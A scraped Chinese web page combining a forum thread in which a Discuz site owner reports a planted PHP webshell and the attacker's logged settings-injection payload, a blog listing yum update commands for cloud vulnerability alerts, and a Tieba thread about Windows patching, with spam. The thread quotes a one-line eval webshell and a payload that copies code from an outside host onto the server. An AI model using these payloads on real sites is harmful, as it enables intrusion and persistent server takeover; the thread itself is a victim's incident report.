安骑士360漏洞修复安装不了在测试中什么鬼?

来源:蜘蛛抓取(WebSpider) 时间:2017-10-25 16:13 标签: 安全狗修复漏洞失败
您还没有登录,快捷通道只有在登录后才能使用。 还没有帐号? 赶紧
我的discuz论坛被植入后门删掉又出现,用安骑士可以彻底修复吗?
在线时间23小时
月初的时候收到阿里云的短信通知说论坛的目录中发现有两个webshell的的木马,在discuz论坛的 data/log 目录中,其中一个叫mc5.php文件内的代码为&\&%&&?php eval($_POST[ob]);?&&%'&&我上百度查了下是可以执行任何php程式的木马,另一个php文件代码很多,好像是用来脱库的,于是我立刻删掉了这两个文件。 & &然后我在discuz后台发现有人盗用了管理员的密码!并在后台执行了以下两行代码(在后台的管理记录中查看到的),两行代码执行的位置都在后台的域名设置中,视乎是利用后台的域名设置选项中的漏洞上传的这个后门! 我当时立刻修改了管理员密码,想说是不是堵住了漏洞!&&GET={settingnew={siteuniqueid=9999; my_sitekey=123456; my_siteid=999; }; domainsubmit=提交; }; POST={settingnew={siteuniqueid=9999; my_sitekey=123456; my_siteid=999; }; domainsubmit=提交; };&&GET={settingnew={maxsmilies=1{${copy('http://t.34597.vip/tm.txt','./data/log/mc5.php')}}; }; domainsubmit=提交; }; POST={settingnew={maxsmilies=1{${copy('http://t.34597.vip/tm.txt','./data/log/mc5.php')}}; }; domainsubmit=提交; };&&但是今天我又收到阿里云的检查到同样的webshell木马,就是那个mc5.php,我上服务器删掉文件,但是立即又生成一个,我去查看discuz的后台管理记录,发现并没有其他人登陆过后台,现在不知道黑客是利用的什么来上传的文件?是不是因为之前管理员密码被盗执行的那两行代码没有得到修复? 我想知道如果购买了安骑士专业版,是可以找出并堵住漏洞还是只能够查出木马然后屏蔽? 如果只是屏蔽不能堵住漏洞的话,跟我现在手动删掉就没啥区别! & [ 此帖被厂长在 16:22重新编辑 ]
在线时间23小时
Re我的discuz论坛被植入后门删掉又出现,用安骑士可以彻底修复吗?
自己摸索着解决了,原来是被写入了数据库自动下载那个后门文件!在pre_common_setting这个表里找到相关字段删除即可!希望可以帮到遇到此问题并像我一样的菜鸟!
在线时间67小时
Re我的discuz论坛被植入后门删掉又出现,用安骑士可以彻底修复吗?
这种情况你可以先把discuz后台密码修改为强密码,防止再被黑客进入后台&这种漏洞安骑士现在暂时没法修复的,关键在这行代码&'995')this.width='995';">&& &你可以在本地写一个测试脚本&'995')this.width='995';">&&这行代码相当于web的后门,PHP在解析到这段payload的时候,会立刻自动执行并不返回结果,所以你一开始即使修改了密码,黑客只要访问到和maxsmilies有关的页面时,webshell又会自动生成& &[ 此帖被dageda在 10:05重新编辑 ]
访问内容超出本站范围,不能确定是否安全
限100 字节
批量上传需要先选择文件,再选择上传
您目前还是游客,请
验证问题: 阿里云官网域名是什么? 正确答案:
&回复后跳转到最后一页阿里云系统漏洞修复合集——高危漏洞提醒【云盾-安骑士】 —技术博客
阿里云系统漏洞修复合集——高危漏洞提醒【云盾-安骑士】
最近可能用阿里云的同学都知道,经常会收到阿里云发的高危漏洞提醒,提醒是没问题,但是点进去发现查看不了解决方案,解决方案要收费。我这就纳闷了,我用的服务器,你提供个修复共性的漏洞你要我给钱?MMP!!!!下面我把修复漏洞的方式方法贡献出来,希望对各位朋友有帮助。比如 RHSA-: kernel security, bug fix, and enhancement update (Moderate)修复方案:yum update kernel
yum update kernel-devel
yum update kernel-firmware
yum update kernel-headers依次在控制台输出即可,会提示下载,到最后有一个 Y/N,选择Y即可。注意是依次,一个一个来。步骤都一样!如下图:最后显示Complete! 完成了。阿里云的46个漏洞所有修复命令全部给出来。yum update kernel
yum update kernel-devel
yum update kernel-firmware
yum update kernel-headers
yum update openssh
yum update openssh-clients
yum update openssh-server
yum update ntp
yum update ntpdate
yum update libxml2
yum update libxml2-devel
yum update libxml2-python
yum update ntp
yum update ntpdate
yum update openssh
yum update openssh-clients
yum update openssh-server
yum update grep
yum update libreport
yum update libreport-cli
yum update libreport-compat
yum update libreport-plugin-kerneloops
yum update libreport-plugin-logger
yum update libreport-plugin-mailx
yum update libreport-plugin-reportuploader
yum update libreport-plugin-rhtsupport
yum update libreport-python
一个一个运行,如果提示找不到包,或者不需要更新那就过了。一个一个吧,其实我已经放弃不修复了!验证完毕后,在阿里云控制台点击对应的验证,不过我建议先一个一个修复,然后再全选、下面有批量验证。
如果本文对你有帮助,那么请你赞助我,让我更有激情的写下去,帮助更多的人。
版权所属:
原文地址:
转载时必须以链接形式注明原始出处及本声明。
工具导航地图
JSON相关:
jQuery 相关:
常用对照表:-
前&&&&&&&&&&端:-
转&&&&&&&&&&换:-
单位换算:-
生活工具:-
格式化、压缩:-
运算符优先级:-
二&&维&&码:-
站长工具:-
月供计算:-
税费计算: -
还款工具:-
时间工具:
进制转换:
程序员福利:
归属网站:
与我们合作:
搜索的内容将在这里展现。 提示:&搜索快捷键:Ctrl + F
/ &关闭快捷键:Esc安全测试点_百度文库
两大类热门资源免费畅读
续费一年阅读会员,立省24元!
安全测试点
阅读已结束,下载文档到电脑
想免费下载本文?
定制HR最喜欢的简历
下载文档到电脑,方便使用
还剩18页未读,继续阅读
定制HR最喜欢的简历
你可能喜欢刚装的系统,360体检发现有漏洞,需要修复吗?【windows7吧】_百度贴吧
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&签到排名:今日本吧第个签到,本吧因你更精彩,明天继续来努力!
本吧签到人数:0成为超级会员,使用一键签到本月漏签0次!成为超级会员,赠送8张补签卡连续签到:天&&累计签到:天超级会员单次开通12个月以上,赠送连续签到卡3张
关注:459,974贴子:
刚装的系统,360体检发现有漏洞,需要修复吗?收藏
上图,大神们看看
2017年全新windows7,32位/64位win7系统下载 纯净稳定,下载速度快
从不打补丁的路过
电脑是新买的,还有下面的那个win7自动更新需要打开吗?
终于抢到二楼了
360所谓的漏洞就是自动更新的补丁
还有平时用什么软件维护计算机啊!
用自带windows update就行
为什么你64位的系统4G的RAM只有3.87G可用?
安装更新最好用windows update360的漏洞修复总感觉不太保险
2017新版Ghost Win7旗舰版系统,win7系统下载,安全稳定,装机必备之选.本站系统下载速度快,免激活,万能驱动完美兼容笔记本,新老台式机,是电脑装机好系统.
开启系统的自动更新,卸掉360
当然,不然有可能被黑客攻击
gorpx zrhy!本人,姑娘一枚,找对象
iwxmp加wo的扣号。Q前4个号:3289,
emdrbowrgrnty后面5个数是:48265
话说楼主是怎么激活的呢
漏洞神马的从来不打裸奔系统
无视,提示就掉右上角的X
修补高危漏洞就行了。
用自带的windows update打补丁,360检测出的系统补丁编号在windows update列表里都找不到。
从来只用windows update打补丁
都不用,没什么必要打补丁。
登录百度帐号推荐应用

我要回帖

更多关于 安全狗修复漏洞失败 的文章

 

随机推荐